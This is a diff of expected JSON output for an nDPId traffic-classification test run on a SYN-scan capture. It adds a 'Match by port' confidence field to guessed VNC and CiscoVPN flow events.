 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4654,17 +4654,17 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","ndpi": {"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","ndpi": {"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","ndpi": {"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4672,7 +4672,7 @@
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","ndpi": {"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4692,7 +4692,7 @@
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","ndpi": {"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4700,7 +4700,7 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","ndpi": {"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -4722,13 +4722,13 @@
